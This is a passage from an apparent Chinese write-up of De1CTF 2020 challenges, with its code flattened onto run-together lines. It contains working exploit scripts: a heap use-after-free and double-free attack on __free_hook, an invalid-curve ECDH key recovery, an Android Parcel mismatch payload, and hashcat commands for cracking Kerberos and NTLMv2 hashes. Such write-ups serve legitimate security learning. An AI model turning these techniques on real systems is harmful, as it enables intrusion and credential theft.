x^6 + x^5 + x^4 + x + 1 x^7 + x^6 + x^5 + x^4 + x^2 x^7 + x^6 + x^5 + x^4 + x^2 + 1 x^7 + x^6 + x^5 + x^4 + x^2 + x x^7 + x^6 + x^5 + x^4 + x^2 + x + 1 x^7 + x^6 + x^5 + x^4 + x^3 x^7 + x^6 + x^5 + x^4 + x^3 + 1 x^7 + x^6 + x^5 + x^4 + x^3 + x x^7 + x^6 + x^5 + x^4 + x^3 + x + 1 x^7 + x^6 + x^5 + x^4 + x^3 + x^2 x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + 1 x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1所以我們data已知,results已知,求inp
只不過運算在GF(2^8)上,需要用到sagemathhttps://sagecell.sagemath.org/
直接寫腳本求解就行了,把最後的結果轉化成字符就行了,一個密碼學的題目
CryptoNLFSR四個LFSR組合成的加密系統,相關係數分析如下:
發現第一個LFSR相關係數0.75,相關攻擊即可
def crack_key(p, mask, partMask): for a in range(2**18, 2**19): single_cipher = single_lfsr(a, mask, partMask, len(cipher)) correlation_value = correlation(single_cipher, cipher) if correlation_value >= (p - 0.05) and correlation_value <= (p + 0.05): print("a is {}".format(a)) return得到 a = 363445
因為x2=0時,value=x3^x4;x2=1時,value=x1,所以第一個LFSR流與最終流不一致的比特位上,第二個LFSR流一定為0
取第一個LFSR流與最終流不一致的至少19個比特位,即可恢復b
single_cipher_a = single_lfsr(a, ma, partMask, len(cipher))
b0_pos = [] #b==0的下標for i in range(2048): if cipher[i] != single_cipher_a[i]: b0_pos.append(i)b0_pos = b0_pos[:19]
mb = 0x40f3f
mb_feedback = []mb_bin = bin(mb)[2:].rjust(24, '0')for i in range(24): if mb_bin[i] == '1': mb_feedback.append(i)mb_feedback.append(24)mb_feedback = [_ - 5 for _ in mb_feedback]# mb_feedback = [0, 7, 8, 9, 10, 13, 14, 15, 16, 17, 18]
cur = []F2 = GF(2)
for i in range(19): v = vector(F2, 19) v[i] = 1 cur.append(v)
for i in range(100): v = vector(F2, 19) cur19 = cur[-19:] for j in mb_feedback: v += cur19[j] cur.append(v)
cur = cur[19:]
left = []for i in b0_pos: left.append(list(cur[i]))A = Matrix(F2, left)
A.right_kernel()於是得到 b = 0b1111000110101010110 = 494934
最後兩個LFSR組成的密鑰空間2^19,直接爆破即可
得到 c = 4406,d = 63
ECCDH這題的漏洞點在於,程序的exchange函數,並沒有檢查我發送的點是否在曲線上。因此,儘管題目中的曲線的階非常大,我們可以通過構造許多階有小因子的曲線,從而通過CRT來找出私鑰。
構造方法是在一篇paper中找到的:Different Fault Attacks on Elliptic Curve Cryptosystems
構造方法:
而題目中給的曲線,$a_1,a_2,a_3$都為0,因此只需要$a_6'= y^2 -x^3-a_4x$即可。(證明其實也很簡單,因為橢圓曲線上的加法與$a_6$無關,因此只需要點在曲線上即可。
paper下面給出的方法是:因為找點來得到特定階的曲線很難,而有復乘法(CM算法),能夠構造給定階數的橢圓曲線,再將點解出來。
但是復乘法的實現較為困難,於是我選擇了隨機找點X(x , y),算出曲線後,利用sage將其階數分解,假設階數為g,有小因子d,則$(g//d) X$這個點的階為d。
如果d的選取都在1w左右,要想CRT後的模超過q,20-30個點即可。手動找了好久。
接下來就是交互,發送之前找到的所有點,然後算出每個k%d,用CRT算出k,後門拿flag即可
import os,random,sys,stringfrom hashlib import sha256from gmpy2 import invert , is_primefrom Crypto.Util.number import bytes_to_long, long_to_bytesfrom pwn import *from functools import reducecontext.log_level = 'debug'q = 0xdd7860f2c4afe6d96059766ddd2b52f7bb1ab0fce779a36f723d50339ab25bbda = 0x4cee8d95bb3f64db7d53b078ba3a904557425e2a6d91c5dfbf4c564a3f3619fab = 0x56cbc73d8d2ad00e22f12b930d1d685136357d692fa705dae25c66bee23157b8x = 0xb55c08d92cd878a3ad444a3627a52764f5a402f4a86ef700271cb17edfa739cazero = (0,0)p = remote('134.175.225.42', '8848')
def CRT(mi, ai): M = reduce(lambda x, y: x * y, mi) ai_ti_Mi = [a * (M // m) * invert(M // m, m) for (m, a) in zip(mi, ai)] return reduce(lambda x, y: x + y, ai_ti_Mi) % Mdef add(p1,p2): if p1 == zero: return p2 if p2 == zero: return p1 (p1x,p1y),(p2x,p2y) = p1,p2 if p1x == p2x and (p1y != p2y or p1y == 0): return zero if p1x == p2x: tmp = (3 * p1x * p1x + a) * invert(2 * p1y , q) % q else: tmp = (p2y - p1y) * invert(p2x - p1x , q) % q x = (tmp * tmp - p1x - p2x) % q y = (tmp * (p1x - x) - p1y) % q return (int(x),int(y))def sha(): p.recvuntil("sha256(XXXX+") pa=p.recv(len('SLhlaef5L6nM6pYx')) p.recvuntil("== ") m=p.recv(len('3ade7863765f07a3fbb9d853a00ffbe0485c30eb607105196b0d1854718a7b6c')) p.recvuntil("XXXX:") table = string.ascii_letters + string.digits for i in table: for j in table: for k in table: for l in table: password=i+j+k+l+pa.decode() if sha256(password.encode()).hexdigest() == m.decode(): p.sendline(i+j+k+l) breakdef pointToString(p): return "(" + str(p[0]) + "," + str(p[1]) + ")"def getflag(secret): p.recvuntil('choice:\n') p.sendline('Backdoor') p.recvuntil('secret:\n') p.sendline(str(secret)) p.recvuntil('Here is your flag:\n') print(p.recvline()) p.interactive()def exchange(x , y): p.recvuntil('choice:\n') p.sendline('Exchange') p.recvuntil('key:\n') p.recvuntil('X:\n') p.sendline(str(x)) p.recvuntil('Y:\n') p.sendline(str(y)) p.recvuntil('success\n')def encrypt(): p.recvuntil('choice:\n') p.sendline('Encrypt') p.recvuntil('message(hex):\n') tmp = '8' + '0'*(q.bit_length()//2 - 1) p.sendline(tmp) p.recvuntil(' is:\n') cipher = p.recvuntil('\n') cipher = int(tmp , 16) ^ int(cipher , 16) x , y = cipher >> q.bit_length() , cipher & ((1 << q.bit_length()) - 1) return x , ydef file_interact(): f = open("./data1.txt","r") line = f.readline() data = [] while line and line != '\n': var = line.split(' : ') tmp = [] tmp.append(int(var[0][1:])) tmp.append(int(var[1])) tmp.append(int(var[2][:-2])) data.append(tmp) line = f.readline() return datadef one_step(x , y , order): exchange(x , y) X , Y = encrypt() p0 = (x , y) tmp = zero for i in range(1 , order+1): tmp = add(tmp , p0) if tmp == (X , Y): return idef get_secret(pointlist):
mi = [] ai = [] for i in pointlist: ai.append(one_step(*i)) mi.append(i[2]) print(mi) print(ai) return CRT(mi , ai)y = 0sha()p.recvuntil('key:\n')p.recvuntil('X:\n')p.sendline(str(x))p.recvuntil('Y:\n')p.sendline(str(y))p.recvuntil('success\n')pointlist = file_interact()secret = get_secret(pointlist)getflag(secret)
Easyrsa本題幾乎是 d3ctf2019-common 的原題,只是在此基礎上稍微需要開開腦洞爆破一點點...用到的方法是 Extending Wiener.所以直接改了 d3ctf 的 exp
mport binascii
N=
e1=
e2=
c=
def Exgcd(r0, r1): # calc ax+by = gcd(a, b) return x
x0, y0 = 1, 0
x1, y1 = 0, 1
x, y = r0, r1
r = r0 % r1
q = r0 // r1
while r:
x, y = x0 - q * x1, y0 - q * y1
x0, y0 = x1, y1
x1, y1 = x, y
r0 = r1
r1 = r
r = r0 % r1
q = r0 // r1
return x
for i in range(684,732):#lower bound and upper bound
M1 = N**0.5
M1 = int(M1)
M2 = N**(1+i/2048)
M2 = int(M2)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
B = Matrix(ZZ, [ [1, -N, 0, N**2],
[0, e1, -e1, -e1*N],
[0, 0, e2, -e2*N],
[0, 0, 0, e1*e2] ]) * D
L = B.LLL()
v = Matrix(ZZ, L[0])
x = v * B**(-1)
phi = (x[0,1]/x[0,0]*e1).floor()
print(binascii.a2b_hex(hex(pow(c, Exgcd(e1,phi), N))[2:]))Homomorphic本題經過題目的提示可知是同態加密系統,於是測試後知道是乘法與加法同態。那麼將Enc(i) for i in FLAG 分成兩塊,分別進行 Dec 並將 fx.list()[0] 相加 % 128,對應的 chr(i) 即為所求。
from pwn import *import hashlibsh = remote("106.52.180.168","8848")sh.recvuntil("sha256(XXXX+")pa = sh.recv(len('SLhlaef5L6nM6pYx'))sh.recvuntil("== ")me = sh.recv(len('3ade7863765f07a3fbb9d853a00ffbe0485c30eb607105196b0d1854718a7b6c'))sh.recvuntil("XXXX:")
table = '0123456789zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP'
def getpwd(password,mess): Password = password for i in table: for j in table: for k in table: for l in table: password=i+j+k+l+Password if hashlib.sha256(password.encode()).hexdigest() == mess: return i+j+k+lsh.sendline(getpwd(pa,me))
for _ in range(5): sh.recvline()
BLOCK = 1024 // 2LIST = []cnt = 0a = ''flag = ''
while 1: a = sh.recvline(keepends=False) if 'Tell' in a: break cnt += 1 LIST.append(a)
for i in range(0, cnt, 2): # cut into 2 blocks num = 0 for j in range(2): if i > 0 and j > 0: sh.recvuntil("choice:\n") sh.sendline("Decrypt") a = LIST[i][1:-1].split(',') a = [0] * (BLOCK * j) + [int(ii) for ii in a[j*BLOCK:(j+1)*BLOCK]] + [0] * (BLOCK * (1-j)) b = LIST[i+1][1:-1].split(',') b = [0] * (BLOCK * j) + [int(ii) for ii in b[j*BLOCK:(j+1)*BLOCK]] + [0] * (BLOCK * (1-j))
sh.recvuntil("):\n") sh.sendline((str(a)[1:-1].replace(' ',''))) sh.recvuntil("):\n") sh.sendline((str(b)[1:-1].replace(' ',''))) sh.recvuntil(":\n") sh.sendline("0") sh.recvline() num += int(sh.recvline(keepends = False)) print(len(str(a)), num) flag += chr(num % 128) print(flag)Pwnstl_container在vector裡面存有UAF漏洞,因此可以通過UAF洩露libc_base,double free打free_hook為one_gadget
#!/usr/bin/env python# -*- coding: utf-8 -*-import sysimport osfrom pwn import *from LibcSearcher import LibcSearchercontext.log_level = 'debug'
binary = 'stl_container'elf = ELF('stl_container')libc = elf.libccontext.binary = binary
DEBUG = 0if DEBUG: p = process(binary)else: host = "134.175.239.26" port = 8848 p = remote(host,port)o_g = [0x4f2c5,0x4f322,0x10a38c]l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))sla = lambda a,b :p.sendlineafter(str(a),str(b))sa = lambda a,b :p.sendafter(str(a),str(b))lg = lambda name,data : p.success(name + ": 0x%x" % data)se = lambda payload: p.send(payload)sl = lambda payload: p.sendline(payload)ru = lambda a :p.recvuntil(str(a))def add(payload): sa("data:",payload)def free(idx): sla("index?\n",str(idx))def show(idx): sla("index?\n",str(idx))def li(choice,payload): sla(">> ","1") sla(">> ",str(choice)) if choice == 1: add(payload) if choice == 2: free(payload) if choice == 3: show(payload)def ve(choice,payload): sla(">> ","2") sla(">> ",str(choice)) if choice == 1: add(payload) if choice == 2: free(payload) if choice == 3: show(payload)def qu(choice,payload): sla(">> ","3") sla(">> ",str(choice)) if choice == 1: add(payload)def st(choice,payload): sla(">> ","4") sla(">> ",str(choice)) if choice == 1: add(payload)
for i in range(2): ve(1,"dddd") qu(1,"aaaa") st(1,"aaaa") li(1,"aaaa"qu(2,"aaaa")qu(2,"aaaa")st(2,"aaaa")st(2,"aaaa")li(2,0)li(2,0)ve(2,0)ve(3,0)libc_base = l64()-0x3ebca0lg("libc_base",libc_base)malloc_hook = 0x3ebc30+libc_basefree_hook = 0x3ed8e8+libc_basesys_addr = 0x4f440+libc_baseone = o_g[1]+libc_basefor i in range(2): qu(1,"aaaa") st(1,"aaaa") li(1,"aaaa")ve(1,"d")li(2,0)ve(2,0)ve(2,0)ve(1,p64(free_hook))li(1,p64(one))# gdb.attach(p)p.interactive()BroadCastTest根據這篇文章裡的思路:https://xz.aliyun.com/t/2364#toc-2
構造POC:
@SuppressLint("WrongConstant") public void send(View view){ Bundle bundle = new Bundle(); bundle.putParcelable("\00\00",new Message()); bundle.putIntArray("\05\00",new int[]{0x12,12,3,4,5,6,7}); bundle.putString("command","\7\0command\0\0\0\7\0getflag");// Log.e("MainActivity",bundle.getString("command")); Parcel parcel = Parcel.obtain(); parcel.writeBundle(bundle); parcel.setDataPosition(0); byte[] bytes = parcel.marshall(); String buffer=""; for (byte b:bytes){ buffer+=String.format("%02x",b); } Log.e("buffer",buffer); Log.e("b64",new String(Base64.encode(bytes,0)).replace("\n","")); Intent intent = new Intent("com.de1ta.receiver1"); intent.putExtra("id",1); intent.addFlags(0x01000000); intent.putExtra("data",new String(Base64.encode(bytes,0)).replace("\n","")); sendBroadcast(intent); }payload 生成 之後log拿出來生成的payload 用010 insert4個\x00就行了
adb shell am broadcast -n com.de1ta.broadcasttest/.MyReceiver1 -a com.de1ta.receiver1 -f 32 --es data RAEAAEJOREwDAAAAAgAAAAAAAAAAAAAABAAAACwAAABjAG8AbQAuAGQAZQAxAHQAYQAuAGIAcgBvAGEAZABjAGEAcwB0AHQAZQBzAHQALgBNAGEAaQBuAEEAYwB0AGkAdgBpAHQAeQAkAE0AZQBzAHMAYQBnAGUAAAAAAAUAAABiAHMAcwBpAGQAAAABAAAAAwAAAAwAAAACAAAACwAAAAQAAAAFAAAADQAAAAAAAAAGAAAABwAAAP////8IAAAAAAAAAAoAAAAAAAAACQAAAAAAAAACAAAABQAAAAAAAAASAAAABwAAABIAAAAMAAAAAwAAAAQAAAAFAAAABgAAAAcAAAAHAAAAYwBvAG0AbQBhAG4AZAAAAAAAAAAVAAAABwAAAGMAbwBtAG0AYQBuAGQAAAAAAAAABwAAAGcAZQB0AGYAbABhAGcAAAA= --ei id 1 code_runner爆破腳本
from pwn import *import hashlibcontext.log_level = "debug"sh = remote("106.53.114.216",9999)def input_key(): sh.recvuntil("hashlib.sha256(s).hexdigest() == \"") encrypt = sh.recv(64) for i in range(0,256): for j in range(0,256): for k in range(0,256): if hashlib.sha256(chr(i) + chr(j) + chr(k)).hexdigest() == encrypt: sh.sendline(chr(i) + chr(j) + chr(k)) log.success("key => %d %d %d" % (i,j,k))input_key()sh.interactive()連接之後發現base64返回一個gz壓縮包,然後解壓之後就是elf,每次連接的elf的文件都是不一樣的,所以大概就是要寫一個自動挖掘機,在短時間pwn掉這個程序。首先這個程序有16個check,所以要先過16個check,然後後面輸入名字,直接輸入空字符直接繞過while直接break。
然後輸入一個shellcode即可
根據函數的頭部來確定check函數地址,然後通過做差計算出每一個函數的size,然後通過size進行分組,每一個分組對應著一個解法,通過這個思路只要寫出所有的size的應對策略就可以實現自動化挖掘。
本人封裝了提取函數get_idx(data,pos,size)和get_opcode_arg(data,pos,size,opcode)
第一個函數可以找到mips彙編下的數組下標
第二個函數可以根據mips's opcode來或者opcode的參數
通過下表和opcode的參數來確定方程的表達式,通過sympy來計算答案,還有一部分較為固定的表達式可以採用預先設置一個固定值的方式。
由於本人很懶,只寫了幾個size的策略,不過也足夠了,通過5個終端爆破10分鐘就可以有一個命中。
Exp如下:
https://paste.ubuntu.com/p/NwtPBMN3bJ/
Miscmc_joinin嘗試直接用MC客戶端連接IP,發現可以識別到MC伺服器,但是版本號不對。然後找了一下發現了一個NodeJS的MC無頭客戶端minecraft-protocol。
嘗試使用無頭客戶端自動協商版本,同時魔改使其強制切換到指定版本。(需要手動修改庫文件)網頁提示了原版本為1.12。
var mc = require('minecraft-protocol');var client = mc.createClient({ host: "222.85.25.41", // optional port: 25565, username: "2233",});DEBUG="minecraft-protocol" node joinin.js 2> record.txtdump出數據
{ "header": "{\n \"text\":\"\\n\\nHIDE FLAG ONE\\n\\n imgur.com/a/ZOrErVM \\n\\n\",\n \"color\":\"black\",\n \"bold\":true\n }", "footer": "{\"translate\":\"\"}"}訪問url:imgur.com/a/ZOrErVM,下載圖片,發現在最低位隱寫了flag圖片且經過了鏡像;拉伸,處理之後讀取到flag
mc_champion
本來以為需要在完整版客戶端裡打龍,想了好久最終決定直接整個代理處理版本信息。主要部分如下
localsocket.on('data', function (data) { console.log("%s:%d - writing data to remote", localsocket.remoteAddress, localsocket.remotePort ); const hex = data.toString('hex'); console.log(hex); if (hex === '1500cf020e3137322e32392e3139382e32303163dd02') { console.log('Handshake'); data = Buffer.from('1000e507093132372e302e302e3163dd02', 'hex'); } if (hex === '0b0009796f7368696e6f5f73') { console.log('Handshake'); data = Buffer.from('06000432323333', 'hex'); } var flushed = remotesocket.write(data); if (!flushed) { console.log(" remote not flushed; pausing local"); localsocket.pause(); }});然而進去了卻發現,動不了也啥東西都沒有,然後經過探索又發現,就是通過輸入命令打龍。
所以直接使用無頭客戶端腳本自動打,注意因為伺服器連接不穩定,動不動TCP包解析錯誤直接斷掉,所以需要多嘗試幾次。var mc = require('minecraft-protocol');var client = mc.createClient({ host: "222.85.25.41", // optional port: 25565, username: "2233",});
/*/help -> show the usage/uuid -> show your uuid/status -> show your status/items -> show your items/exchange -> make some exchange/shop -> list all category/shop [category_id] -> list items in category/buy [item_id] -> buy the item/use [item_id] -> use your item/attack -> attack the BOSS*/
let reso = null;
client.on('chat', function (packet) { // Listen for chat messages and echo them back. var jsonMsg = JSON.parse(packet.message); const t = jsonMsg.text + jsonMsg.extra.map(i => i.text).join(''); console.log('Recv <- ' + t); if (reso) { reso(t); }});
async function say(s) { console.log('Send -> ' + s); client.write('chat', { message: s }); const ret = await Promise.race([new Promise(res => reso = res), delay(2000)]); return ret;}
async function delay(t) { return new Promise(res => { setTimeout(res, t); });}
const del = 1000;
setTimeout(async () => { await say('/exchange 1'); await delay(del); await say('/exchange 1'); await delay(del); await say('/exchange 1'); await delay(del); await say('/exchange 1'); await delay(del);// 初始40XP換錢
await say('/buy 5');// 買鑽石劍 await delay(del); while (1) { await say('/attack');//攻擊 await delay(del); await say('/buy 19'); await delay(del); await say('/use 19'); await delay(del); await say('/buy 19'); await delay(del); await say('/use 19');// 買兩個麵包,吃兩個麵包 await delay(del);
await say('/exchange 1'); await delay(del); await say('/exchange 1');// 每次攻擊獲得20XP,換錢 await delay(del); }
}, 2000);打完之後出來
Congratulation!Encoded Message:F5GUGMRQGIYC2RCFIJKUOLKWJFCVOORNFEFFC4RRKBDVG62GGNYGQZJTL5EGMTSUGNPTA4ZNKRBF6RTZOZYHE7T5base32,然後凱撒,獲得flag
life附件連結:https://pan.baidu.com/s/157d06EZeBdTqqKAjnxIU_g
提取碼:ecr2
題目詳解
下載附件得到一張圖,圖名為game,內容是動漫遊戲人生劇場版宣傳報,binwalk分離可以得到一張圖片和一個加密的壓縮包,推測壓縮包中信息即為flag
觀察圖片,剛開始推測是二維碼之類的東西,數了一下像素點,是27x27的格式,但是二維碼並沒有這種規格,而且缺少存放格式化信息的數據塊,根本無法還原二維碼,還推測為DataMatrix,但也由於差距太大不相符,各種碼沒有進展,轉而思考題目中包含的信息
題幹名為life,附件名為game,題目描述為No Game No Life!,聯繫在一起想到life game即生命遊戲
什麼是生命遊戲[1]?
查看可知這種遊戲也可以由像素點形式實現,和binwalk得到的圖片非常相似,於是嘗試以圖片內容構造遊戲,有網站可以實現在線遊戲(戳這裡[2])
按照圖片上的像素點位置點出圖案,然後進行一次單步操作,即可得到一個二維碼
掃碼即可得到解壓密碼:AJTC8ADEVRA13AR
解壓zip包,得到一個txt文件,觀察文件名txt.pilf.txt,而中間pilf正是flip的翻轉,其詞義也是翻轉,於是聯想到將文件內容進行翻轉,先翻轉內容解base64,再將結果翻轉decode('hex'),即可得到flag
a='0QjN1MTM0MTN0QjN3ImNjNzM3QTNmdTN3MTNmdzMzcjNxcjM3QTNmdDN2gzMzUjZ2czM0YDZzMjMxcDZ'a=a[::-1].decode('base64')flag=a[::-1].decode('hex')print flagMisc雜燴/Misc Chowder題目描述和hint:
流量包中的網絡連接對解題沒有幫助 The network connection in pcap is not helping to the challenge
不需要訪問流量裡任何一個的伺服器地址,所有數據都可以從流量包裡直接提取 Do not need to connect the network, every data can be extracted from the pcap
In the burst test point of compressed packet password, the length of the password is 6, and the first two characters are "D" and "E". 壓縮包密碼暴破考點中,密碼的長度為6位,前兩位為DE。
連結:https://pan.baidu.com/s/13eIrCZAoEpLXGQ8V2aJlfQ 提取碼:cyym
拿到這個題目,首先看一遍流量,然後發現一個upload_file.php
裡面是傳了一張png圖片,保存下來,可得:
然後獲得一個readme.zip文件
連結:https://pan.baidu.com/s/19xUSOq-UKa-CqO-6vXAIVA 提取碼:mjih
readme.zip文件解壓獲得一個docx文件,裡面放著兩張圖片。然後對docx文件binwalk -e提取出一個壓縮包You_found_me_Orz.zip:
然後根據hint3進行掩碼爆破,得到password為DE34Q1
解壓獲得一張圖片,再次binwalk -e獲得一個rar文件,解壓發現有個flag.txt,但是提交發現不對,不是最後的flag。
那麼在cmd執行dir /r,發現有隱藏的信息:
那麼考慮NTFS隱寫,用NtfsStreamsEditor2搜索可得最後flag:
mc_easybgmstep 1.保存
打開網頁查看源碼找到MP3路徑右鍵另存為保存到本地
step 2.保留幀頭信息使用AU打開嘗試音頻分析無果
用Mp3stego嘗試分離無果
後學習到mp3音頻幀存在幀頭信息,具體分析可以看
https://www.jianshu.com/p/c3f8be205e3f
發現保留字位即private_bit位可控寫入信息,猜測存在隱寫
修改010editor的MP3模板輸出保留字信息(這裡有個坑的地方,就是用010editor輸出的private_bit信息缺少第0幀的數據,需要在前面補1),得到如下信息
step 3.解密
可以看到後面有一大部分數據為0,是需要我們捨棄的數據,對這段01按照ASCii碼分長度把它保留到與8整除的位置剛好完成後,後面的0全部捨棄,然後將保留的數據反轉,並且8個一組分割開,轉成字符串即可
payload:
import refina = ''result = '010001000110010100110001010000110101010001000110011110110101011100110011001100010110001100110000011011010011001101011111011101000011000001011111010011010110100100110111001100110100001101010010001101000100011001110100010111110101011100110000011100100011000101000100010111110100010000110011011010100100000101010110011101010010000101111101'textArr = re.findall('.{'+str(8)+'}', result)for i in textArr: fina = fina + chr(int(i,2)).strip('\n')print finaEasy Protocol拿到文件winhex打開是個壓縮包改下後綴名發現三個流量包
在part1中找到關鍵字De1CTF然後在LDAP協議中找到密鑰
在part2中相同的方法找到密鑰
Part3有些特殊,找到了幾個分
接下來使用hashcat破解Kerberos 5,
etype 18, Pre-Auth 需要使用最新版的Linux下的hashcat進行爆破 僅此版本支持該模式
提示說八位數字,就生成了一個純8位數字的字典(word.list)用使用高算力設備進行爆破三組數字,過程持續兩小時有餘:
part1:hashcat64.exe -m 13100 $krb5tgs$23$*De1CTF2020$test.local$part1/De1CTF2020*$b9bac2cd9555738bc4f8a38b7aa3b01d$12befde687b62d10d325ebc03e0dd0d6bca1f526240dfa6d23dc5bcafc224591dcf4ba97bf6219cfbe16f1b59d289800fdcc8f051626b7fe0c2343d860087c45b68d329fd1107cebe4e537f77f9eea0834ae8018a4fe8518f1c69be95667fd69dcc590d3d443a8530ff8e38ee7f7b6e378d64a8b43b985bcc20f941947ea9e8463fd7e0fa77f284368b9b489f6d557da1e02990cfc725723e5d452ff6e659717947805b852ad734c5acc8011e535b96cef3af796610196d31c725362f7426e0cf92985ffe0717baaf5066fdba760b90e2c9b7e15bc9a4952cff47d4a092d3be6128997f9ff85dbafb85a5569b5d021b2a23c6371cbdf8beaa68b332e6ba1c1a8dc43c50695498ed8c2dfbf11760af35e1b913cd36b8015df37a146d2696c8b6b5f2ce375f2674acc0ce04aa98b9d21291466ce7a2aeb5a72fda17fa53e5b41df67d3898457d05fc899096092b3aa5bc333cb75eb5eee4b1c33356e72d9d28d6d674a5e47f64c72afb580e8d4f713a5ae265a4c825c39c19313a532a23c27eaf24bcde29c5e65c13cc057e0db72094bcedb6049574e35e511847f460180ddd78f4c9187345b1068bd608ca238c20d200ffa7e3891d076fe6fcef93d044c79f5ec9fb33561a35acf785b2a203df6d07e39161d9d3cedbe6d4394bd2bf43e545acd03f796c7863d684f9db4a5eef070f71e58a4882c2387d0705f4bed32fd7986dd672a15f6cfa56fe127af7c157216b2ea4f61ab7963d9dcaf4bb9222a7cba86d6a5e6c24833ffbf1957d90224764a01e0cb5a90f12dfea4ddaef23e30c2bdafcbcd99031db5d0698c1a050fc679213a8b81b854c08686f43241a4ec937c71cd09c9519fa2bba3aa845c4e84dbd6d9bbc3a62c876fb4c30bfa7960f0f51587ece14a31add698b1b9743e14fc343394f8a346c8e24cc8c26a8f8246f6a68928d0118dea81fea9976af3c57fa4c764f565e458e065d5a2a3dd1b083f7851d4ae1b791ada853e9a20e5b169ea0b8b582711f04df4dad8b461771dda5fca11c3f8f82d85e657bbd57d12cf15c8bbce7ad6cd1ebf540c45aefd4aef2ec828b06f208bd57be6a5529481b9f8b8fad5962e86b349a720ec2a1380ed711ee0261b29383907dae6f7a45d3fff54efae7ace1f4d7193f4a4d932699a41c3deb3ba9934278942e8f09ecd4339de4059dd3ff06b78e773b6ab9826df7ea2a443dddd55cdf79db1f76e2f05105e6cc5f0c4bd494b9556d921c6cb3fa48d1ddd27cf077ebd3e44b716fc74d1115b293e348fb9676e6727a3a97a7c2b86e8b83d8f90b9bf628c71e56aabcac381a32d493db3f255378c498a0bf527a9677cb81ec89911a9b09d6ffe16e2f2de63728439f8275d9f6feac2da860c5aab772034b2b0b962c033f8102ac86b2a9b07a82e9c70be65fe371e9d296afbe0e7272b90256428553c6a4fb0a8f5290098e4dad4021d99a65f2a3fa4ad0d2f ?d?d?d?d?d?d?d?d -a 3 --force
part2:hashcat64.exe -m 18200 $krb5asrep$23$De1CTF2020@test.local:2a00ca98642914e2cebb2718e79cbfb6$9026dd00f0b130fd4c4fd71a80817ddd5aec619a9b2e9b53ae2309bde0a9796ebcfa90558e8aaa6f39350b8f6de3a815a7b62ec0c154fe5e2802070146068dc9db1dc981fb355c94ead296cdaefc9c786ce589b43b25fb5b7ddad819db2edecd573342eaa029441ddfdb26765ce01ff719917ba3d0e7ce71a0fae38f91d17cf26d139b377ea2eb5114a2d36a5f27983e8c4cb599d9a4a5ae31a24db701d0734c79b1d323fcf0fe574e8dcca5347a6fb98b7fc2e63ccb125a48a44d4158de940b4fd0c74c7436198380c03170835d4934965ef6a25299e3f1af107c2154f40598db8600c855b2b183 ?d?d?d?d?d?d?d?d -a 3 --force
part3(NTLM v2 hash):hashcat64.exe -m 5600 De1CTF2020::TEST:56886f90fcb73ded:b5991cc2a0d585d0f813358eaafc7412:0101000000000000130cb9102308d601d2290bc0c25617a80000000002000800540045005300540001000c0044004d0032003000310032000400140074006500730074002e006c006f00630061006c000300220064006d0032003000310032002e0074006500730074002e006c006f00630061006c000500140074006500730074002e006c006f00630061006c0007000800130cb9102308d60106000400020000000800300030000000000000000000000000100000ecaa3d44ddc464026c453206813aafa0b918f2ad43d497ef8fb6beb2083258a40a0010000000000000000000000000000000000009001e0048005400540050002f0074006500730074002e006c006f00630061006c000000000000000000 ?d?d?d?d?d?d?d?d -a 3 --force
hashcat -m 19700 -a 3 ./part_x_hash.txt ./word.list --force
References[1] 生命遊戲: [https://zh.wikipedia.org/zh-cn/%E5%BA%B7%E5%A8%81%E7%94%9F%E5%91%BD%E6%B8%B8%E6%88%8F](https://zh.wikipedia.org/zh-cn/康威生命遊戲)
[2] 戳這裡: https://funnyjs.com/jspages/game-of-life.html
Hard_Pentest 2
Calc
ReverseParser
mc_champion
題目詳解
mc_easybgmstep 1.保存
step 3.解密
相關焦點
-
2020 *ctf 部分pwn writeup
, "1") p.sendlineafter("input index\n", str(index)) p.sendlineafter("input size\n", str(size))def delete(index): p.sendlineafter(">> \n", "2") p.sendlineafter("input index\n", -
TISC 2020 CTF 題目分析及writeups
The file is hosted at http://fqybysahpvift1nqtwywevlr7n50zdzp.ctf.sg:31080/325528f1f0a95ebbcdd78180e35e2699.zip .Flag? -
HCTF2018 WriteUp
所以需要大寫類型的unicode Admin找到了一個ᴬdmin註冊->登錄>changepassword->登錄->flagWarmup源碼注釋裡提示有source.php,繞過文件名檢測然後文件包含即可:http://warmup.2018.hctf.io/index.php?file=hint.php? -
SCTF2019 Writeup——De1ta 文末有彩蛋
.split(" ") #print a n = Node() for i in range(2,len(a)): #print a[i], if a[i] == '0' : n.t = 1 if a[i] == '1' : n.r = 1 if a[i] == '2' : n.b -
TCTF/0CTF2018 XSS Writeup
application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://202.120.7.197:8090/newAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: BL0G_SID=vV1p59LGb01C4ys4SIFNve4d_upQrCpyykkXWmj4g-i8u2QQzngP5LIW28L0oB1 -
SUCTF-WriteUp(下)
("\r\n","yes")p.sendlineafter("\r\n",str(stack_addr+0x98FE70-0x98FEA8))p.recvuntil("is ")magic1=int(p.recvuntil("\r\n"),16)p.sendlineafter("\r\n","yes")p.sendlineafter("\r\n",str(stack_addr -
RCTF 2020 Writeup
lw $v0, 0x10C0+var_1068($fp) .text:0000000120001B60 addu $v0, $v1, $v0 .text:0000000120001B64 sw $v0, 0x10C0+var_10B8($fp) .text:0000000120001B68 daddiu $v1, $fp, 0x10C0+var_1038 .text:0000000120001B6C -
OGeek線上CTF挑戰賽pwn題詳細Write Up
{// The underlying byte array.var bytes = new Uint8Array(8);switch (typeof v) {case 'number': v = '0x' + Math.floor(v).toString(16);case 'string':if (v.startsWith('0x')) -
CTF從入門到提升(三)
idf實驗室:題目非常基礎,只1個點:http://ctf.idf.cn有線下決賽題目復現:www.ichunqiu.com 題庫網站,歷年題,練習場,比較難:oj.xctf.org.cn/xctf 非常入門的國外ctf題庫,很多國內都是從這裡刷題成長起來的:國外,入門,有移動安全:canyouhack.itA方向 密碼,逆向酷炫遊戲代:microcorruption.com/login A方向,簡潔 -
安洵杯2020 官方Writeup(Pwn)
